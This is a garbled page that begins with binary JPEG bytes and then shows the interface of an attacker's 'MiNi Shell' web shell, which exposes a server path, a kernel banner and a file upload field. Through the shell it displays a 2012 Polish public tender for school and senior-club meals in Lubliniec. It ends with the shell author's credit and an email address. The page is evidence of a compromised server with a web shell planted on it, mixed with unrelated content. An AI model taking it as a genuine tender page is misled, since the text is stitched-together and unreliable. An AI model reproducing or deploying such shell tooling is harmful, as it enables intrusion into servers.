JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/445034-N-2012.html

<p class="kh_header"><b>Lubliniec: 1.	Przedmiotem zamówienia jest dożywianie uczniów w Gimnazjum Nr 1 w Lublińcu przy ulicy Płk. Wilimowskiego 8, Gimnazjum Nr 2 w Lublińcu przy ulicy Droniowickiej 45, Zespole Szkół Katolickiego Stowarzyszenia Wychowawców w Lublińcu przy ulicy Piłsudskiego 8 oraz uczestników Domu Dziennego Pobytu Klub Seniora w Lublińcu przy ulicy Piłsudskiego 8.</b><br>
<b>Numer ogłoszenia: 445034 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Lublińcu , ul. Oświęcimska 30, 42-700 Lubliniec, woj. śląskie, tel. 34 3562005, faks 34 3513378.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.lubliniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Przedmiotem zamówienia jest dożywianie uczniów w Gimnazjum Nr 1 w Lublińcu przy ulicy Płk. Wilimowskiego 8, Gimnazjum Nr 2 w Lublińcu przy ulicy Droniowickiej 45, Zespole Szkół Katolickiego Stowarzyszenia Wychowawców w Lublińcu przy ulicy Piłsudskiego 8 oraz uczestników Domu Dziennego Pobytu Klub Seniora w Lublińcu przy ulicy Piłsudskiego 8..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I - przygotowanie i dostawa posiłków dla uczniów szkół: Gimnazjum Nr 1, Gimnazjum Nr 2, Zespół Szkół Katolickiego Stowarzyszenia Wychowawców im. E. Stein w Lublińcu.

II ŚNIADANIE DLA UCZNIÓW ZESPOŁU SZKÓŁ KATOLICKIEGO STOWARZYSZENIA WYCHOWAWCÓW IM. E. STEIN W LUBLIŃCU

1.	Posiłek w postaci II śniadania przeznaczony jest dla uczniów w ramach Gminnego Programu i Rozwiązywania Problemów Alkoholowych oraz Przeciwdziałania Narkomanii. 
2.	Proponowane II śniadanie powinno składać się z:
a)	 różnego rodzaju pieczywa: pszenne, razowe (o wadze min. 100 gram, posmarowanego masłem bądź margaryną śniadaniową min. 10 gram).
Kanapka powinna zawierać przykładowo takie produkty jak:
- 2 plastry szynki lub innej wędliny (min. 30 gram); 
- 2 plastry sera żółtego (min. 30 gram);
- dżem, miód ( min. 30 gram);
- ser topiony, pasztet drobiowo- warzywny, paprykarz, pasty do kanapek - np. rybne, jajeczne, serowe (min. 30 gram);
- ser biały ( 40 gram );
Przy czym kanapki (w zależności od składu) będą wzbogacane dodatkami w postaci: liść sałaty, 2 plastry pomidora, 3 plastry ogórka świeżego lub kiszonego, papryka, rzodkiewka, szczypiorek, ketchup, majonez, itp.). Masa całkowita kanapki nie może być mniejsza niż 150 gram.
 Każda kanapka powinna być zapakowana oddzielnie (woreczek foliowy, papierowy lub folia).

b)	słodkiego ciastka, drożdżówki (np. z dżemem, serem, budyniem) + owoc. 
Zamawiający nie dopuszcza, aby  II śniadanie przygotowane w tej formie występowało częściej niż raz w tygodniu.

Szacunkowa ilość dni żywieniowych dla uczniów korzystających z II śniadania - 182
Dzienna szacunkowa ilość uczniów korzystających z II śniadania- 6	
Planowana godzina wydawania II śniadania9:45 - 10:00

OBIAD DLA UCZNIÓW SZKÓŁ: GIMNAZJUM NR 1, GIMNAZJUM NR 2, ZESPÓŁ SZKÓŁ KATOLICKIEGO STOWARZYSZENIA WYCHOWAWCÓW IM. E. STEIN W LUBLIŃCU

1.	Gorący posiłek jest przeznaczony dla uczniów objętych dożywianiem w ramach programu Pomoc państwa  w zakresie dożywiania - ustawa z dnia 29 grudnia 2009 roku o ustanowieniu programu wieloletniego Pomoc państwa w zakresie dożywiania (Dz. U. z 2005 roku Nr 267, poz. 2259 ze zmianami).
2.	Gorący posiłek zostanie przygotowany w postaci codziennych obiadów dwudaniowych w następującej formie:
a)	zupa, która ma być przygotowana na wywarze mięsno - warzywnym (400 ml);
b)	zupa (w zależności od rodzaju) powinna być podawana z pieczywem (1 bułka lub 2 kromki chleba); 
c)	drugie danie powinno być posiłkiem mięsnym, rybnym lub mącznym z urozmaiconymi surówkami lub gotowanymi jarzynami (150 gram) oraz napój lub kompot do popicia (200 ml).
Do mięsa lub ryb (od 100 gram) należy podać ziemniaki lub zamienniki, typu: ryż, kasza, makaron (200 gram).
Nie częściej niż raz na dwa tygodnie drugie danie mogą stanowić także: pierogi, naleśniki, krokiety  z nadzieniem, kopytka, kluski z dodatkami mięsnymi, makaron, bigos, fasolka po bretońsku, itp. o gramaturze 400 gram na porcje.
3.	Gorący posiłek powinien zawierać dodatek białkowy (50 gram). W zależności od formy podania wkładka białkowa powinna znajdować się w zupie bądź w drugim daniu. 
4.	Gorący posiłek winien zawierać od 900 do 1200 kcal.
5.	Zamawiający nie dopuszcza, aby w ciągu 10 dni nastąpiła powtarzalność tej samej zupy lub drugiego dania.

Gimnazjum Nr 1: 
Szacunkowa ilość dni żywieniowych dla uczniów korzystających z obiadu - 176
	
Dzienna szacunkowa ilość uczniów korzystających z obiadu- 20
	
Planowana godzina wydawania obiadu- 12:20

Gimnazjum Nr 2:
Szacunkowa ilość dni żywieniowych dla uczniów korzystających z obiadu - 176
	
Dzienna szacunkowa ilość uczniów korzystających z obiadu- 25
	
Planowana godzina wydawania obiadu- 13:20

Zespół Szkół Katolickiego Stowarzyszenia Wychowawców im. E. Stein w Lublińcu:

Szacunkowa ilość dni żywieniowych dla uczniów korzystających z obiadu - 182
	
Dzienna szacunkowa ilość uczniów korzystających z obiadu- 6
	
Planowana godzina wydawania obiadu- 12:35 - 12:55

Gimnazjum Nr 1, Gimnazjum Nr 2 oraz Zespół Szkół Katolickiego Stowarzyszenia Wychowawców im. E. Stein w Lublińcu zapewniają pomieszczenie do wydawania i spożywania posiłków przez uczniów wraz z opieką pracownika szkoły wskazanego przez Dyrektora.

CZĘŚĆ II - przygotowanie i dostawa posiłków dla uczestników placówki Domu Dziennego Pobytu Klub Seniora w Lublińcu

Dla uczestników Domu Dziennego Pobytu Klub Seniora należy przygotować jeden posiłek dziennie w postaci obiadu dwudaniowego z wyłączeniem dań słodkich oraz z uwzględnieniem wcześniej zamówionych diet.
Obiad dwudaniowy powinien składać się z: 
a)	zupy, która ma być przygotowana na wywarze mięsno - warzywnym (400 ml);  zupa (w zależności od rodzaju) powinna być podawana z pieczywem (1 bułka lub 2 kromki chleba); 
b)	drugiego dania, które powinno być posiłkiem mięsnym, rybnym lub mącznym z urozmaiconymi surówkami lub gotowanymi jarzynami (150 gram) oraz napój lub kompot do popicia (200 ml).
Do mięsa lub ryb (od 100 gram) należy podać ziemniaki lub zamienniki, typu: ryż, kasza, makaron (200 gram).
Nie częściej niż raz na dwa tygodnie drugie danie mogą stanowić także: pierogi, krokiety z nadzieniem, kopytka, kluski z dodatkami mięsnymi, makaron, bigos, fasolka po bretońsku, itp. o gramaturze 400 gram na porcje.
3.	Gorący posiłek powinien zawierać dodatek białkowy (50 gram). W zależności od formy podania wkładka białkowa powinna znajdować się w zupie bądź w drugim daniu. 
4.	Zamawiający nie dopuszcza, aby w ciągu 10 dni nastąpiła powtarzalność tej samej zupy lub drugiego dania.
Dom Dziennego Pobytu Klub Seniora: 
Średnia liczba obiadów w miesiącu - 409
Planowana godzina wydawania obiadu - 13:30
Obiad należy dostarczyć do placówki DDP Klub Seniora w dniach od poniedziałku do piątku każdego tygodnia w okresie trwania umowy za wyjątkiem świąt. W wyjątkowych sytuacjach, za zgodą i/lub na wniosek Zamawiającego dostawa posiłków może odbywać się w innych dniach i/lub godzinach po uprzednim uzgodnieniu  z Wykonawcą. 
Wydawanie posiłków następować będzie zaraz po ich dostarczeniu.
Placówka dysponuje pomieszczeniem do spożywania posiłków przez uczestników Domu Dziennego Pobytu Klub Seniora.
Uczestnikami Domu Dziennego Pobytu Klub Seniora są osoby w wieku pomiędzy 36 a 94 rokiem życia z różnymi schorzeniami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.52.40.00-9, 55.52.31.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania wiedzy i doświadczenia będzie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 2 usługi w zakresie żywienia zbiorowego np. dożywianie w szkołach, prowadzenie stołówki lub lokalu gastronomicznego, obsługa gastronomiczna (zgodnie   z załącznikiem nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli oferent wykaże dysponowanie sprzętem niezbędnym do prawidłowego wykonania przedmiotu zamówienia. Wymagane minimum potencjału technicznego to:
- 2 termosy do przewozu żywności;
-  samochód odpowiadający wymaganiom sanitarno - higienicznym do transportu żywności.
 (załącznik nr 7 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony jeśli Wykonawca wykaże, że dysponuje co najmniej trzema osobami posiadającymi aktualną na dzień składania ofert książeczkę zdrowia niezbędną przy wykonywaniu czynności polegających na kontakcie z żywnością. 
Każda osoba zdolna do wykonania zamówienia winna posiadać kwalifikacje zawodowe; tj. wykształcenie zawodowe (kucharz), lub wykształcenie średnie techniczne (np. technik gastronom, technik żywienia                           i gospodarstwa domowego, technik technologii żywienia) oraz trzy letnie doświadczenie zawodowe w zakresie żywienia zbiorowego (zgodnie z załącznikiem nr 6 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Wykonawca wybrany do podpisania umowy zobowiązany będzie przed jej podpisaniem przedłożyć Zamawiającemu zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Organów Państwowej Inspekcji Sanitarnej wydane przez właściwego Państwowego Powiatowego Inspektora Sanitarnego. Brak wpisu stanowić będzie podstawę uznania, że wykonawca uchylił się od podpisania umowy           i skutkował będzie konsekwencjami określonymi w art. 46 ust. 5 pkt 1 ustawy Prawo zamówień publicznych.
b)	Pełnomocnictwo (jeżeli dotyczy) do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważnioną z mocy prawa - oryginał lub kopia poświadczona za zgodność                      z oryginałem. Pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną. Fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem (liderem) konsorcjum. Jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać Pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców. Formularz pełnomocnictwa  jest załącznikiem nr 4 do SIWZ.
c)	Proponowany pięciodniowy jadłospis, uwzględniający wytyczne Zamawiającego wynikające z SIWZ, osobno dla szkół i Domu Dziennego Pobytu Klub Seniora.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.lubliniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Oświęcimska 30
42 - 700 Lubliniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Oświęcimska 30
42 - 700 Lubliniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com